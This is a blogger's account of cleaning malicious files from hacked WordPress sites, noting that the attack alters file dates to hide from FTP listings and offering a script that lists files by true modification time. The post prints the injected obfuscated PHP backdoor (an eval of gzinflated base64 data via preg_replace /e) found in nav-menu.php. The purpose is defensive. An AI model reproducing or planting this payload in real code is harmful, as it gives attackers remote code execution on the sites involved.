I recently received an email from my web host, notifying me that a few files on a couple different websites had malicious code in them.
This was actually the second time I received an email about files on these websites. I had already gone through them a few days previously, hunting through various directories in FTP and manually deleting or cleaning all the files I found that had recent dates.
Bah!
So I did it again … logged in via FTP, deleted the files they mentioned, went through a few directories with files sorted by date, and deleted a bunch more malicious files that my host hadn't detected.
Yet I suspected there was at least one more file lurking around somewhere.
So! I asked my programmer friend to put together a script that could display a list of all files on a website and sort them by date.
Lo and behold! A few interesting things happened.
First, here's a file that had malicious code injected.
Notice anything weird about it?
Me neither!
The file has the same date, time and permissions as all the others around it. This is how I missed it the first time — simply sorting a list of files in this directory by “Last modified” did NOT in fact show the file's actual date!
But, my friend's script showed a different story.
In this list, nav-menu.php is the newest file on the entire website.
OK! So we've got a bot that installs malicious code into a file, saves it — and then does something to the file's date attribute to reduce the chance of detection through FTP.
What does it inject, exactly?
preg_replace(“/.*/e”,”\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'jVb/U+I6EP+dvyLmmLGd40tB8Q583B0DVW/mBAfLe089pxPaFKq06UuDgCf/+9ukUAqoY2Y0TXY/u9ndTzbkct40dITPQsTpf1MaC3vKJ7ZLBNHy8KWjPzkEI+8wl6ImwvhUrX0PaWukTed+LGINOxLqh77AusQpxQQ8Bmgq1fTTVKQ2YypYJDRQK6D2oP+rd2XZ1s9LszewCujkI9rtXrdrtq0UVPsICKYCUkF+QLlvWoN+1+q3utdnZr+AKh8BXVjW1YXZ6kgA4ZwstBQjx+G/xTPGZ4S71JVfDXRY+pG3r83+32b/DvfNy55l2q1Op4/vC9vIQUx5sTWioZCgDUZ6tAewslvnZtfaw/WpRzlVnrQfO7C+CZGZ4Ov7W4IGpkEkFkAVD+sby3omF2uiqJzQOXVkRl6RC+4HmlqshEv1n05i+iq3vJg5jyyiYcKt1FwAtiLCYyp5q62quRF7EchTrJYP7vCYxQLygr4aUH3KeciSORY8YVuKlgcBC1l/cngz7gsqJQWEz00LYVRC0nJExBjfwwJ/X2/BleKLZA/JXJYrpcpv/ju8gEM0UmBypC0ncgBI6mZrjd+r9VsG9miG36TZnonEzDtc0ZSLlFd7B0w19QbG+hv2lY02C0Oqqt5A7QmLqdyUfzhblNe60XrMxv6EIu3Ao8xTldv3l0BLQIoRBV6pIlYMQ982NAHSafkxJS7lcSEB6eCQzqMJfCYxq6Othdt4z5HnV0fYCJY7PN+EkbZGREJ3Q1fk+jEZTqi7CpNTMeVhAjvNLXM5YC3jNqcR48IPR5oMI5e3IxLDmDHuSuN1o2o4jls/rh1VHVIj7vFJ9eRLvUprdVqretK4JPoBlPiqd20BjatA2Fa3gzY7YBD2mk2UNZ6+DQTc7LQ3PA1JQDFqfkPROLLVSsu0DCx3nyC5UO211mq5pRYTjwYQrtL5ASmyoWya2rbV/kp5lWbqjBmC6+KTif8M+Sewv0ybyoHqXlo2Tl0F+rE46ROZaEMS05Nj26WyCNumdFUT39v4geZwh50xdR43nrJ7zearfiAIDf91UCwqNcrtWBAuEF4FmReB7Gp77zUeCxE1yuXZbFYaMTaa0JLDgjJnQybikpgLnMmSFk+H0PE0aQzeS0PPyjBae6ahWyx+wyq0aQhvnLZ14tOc4k6CTIKWBmyXhTS5exC0mtOcrJrD4U73Orzf1l+fL3knUlSmWQGigAzZstFBEx1+OS5VqrXDHa8RpyM7IMIZa7isJVmBdLwEcSinBRkz9hJTwp3xyxCu0AuJH1/80IWXi+tlX17v906cXgEoApRkmxyYXPQNp8OeflVrEameLW7+cSs317Xn4cUkctq1h2HVeLoJ5k+3i6/lm+DGoP5txT2veE61XnGC7uTK+vnc7VwavQdzdmkNjnoWm3cfLptpP1w3kNd/uq2UssxP+pgk4g6PN4Jsxj7dkeJzq3hrFOufy/efm3+MwtHykx+vux5MwfZznFZfPfFTuul+EfdDses2uDPu0/d/mfsf'\x29\x29\x29\x3B”,”.”);//iend
You can copy/paste the above into this decoder to make this readable.
This code is always the same, always appears on line 465, and is always in the file /wp-includes/nav-menu.php.
If you suspect your website may have been hacked, simply download this script, upload it into the root directory of your website, and view it in a browser. (Be sure to delete the script immediately after viewing the report.)
If nav-menu.php has a different date in this list than it does in your FTP program, it may have been hacked!
Other Malicious Files Found
The script turned out to be handy in helping me delete a bunch of other malicious files that also weren't detected by my host.
This highlighted file, for example, appears to be the oldest in the directory — which MUST mean it's the safest, right? There's no way I'd have a malicious file that's been sitting there for 2 years, right?
Once again, the script showed a different date (it was the newest on the whole website):
Other baddies my host didn't find, that had suspicious modified dates:
While today was more or less a write-off, going through all the websites I host with the same fine-toothed comb, tonight I'll rest a little bit better knowing the world is a safer place. π
Download
So, what are you waiting for? Find those evil lurking files on your website now! Download the script here. I've got 3 other file-viewing scripts available for download here as well.
Disclaimer
For obvious reasons, I recommend deleting these scripts from your server as soon as you use them.
I certainly canβt be held responsible for anyone who creates a list of all files and directories on their entire website β¦ and leaves it open to the public. π
Enjoy!
Lovable nerd dedicated to improving peoples' lives. Originally from Canada. Current home base: Hengelo, Netherlands. Visited 30 countries since 2013. [
Awesome. I check this out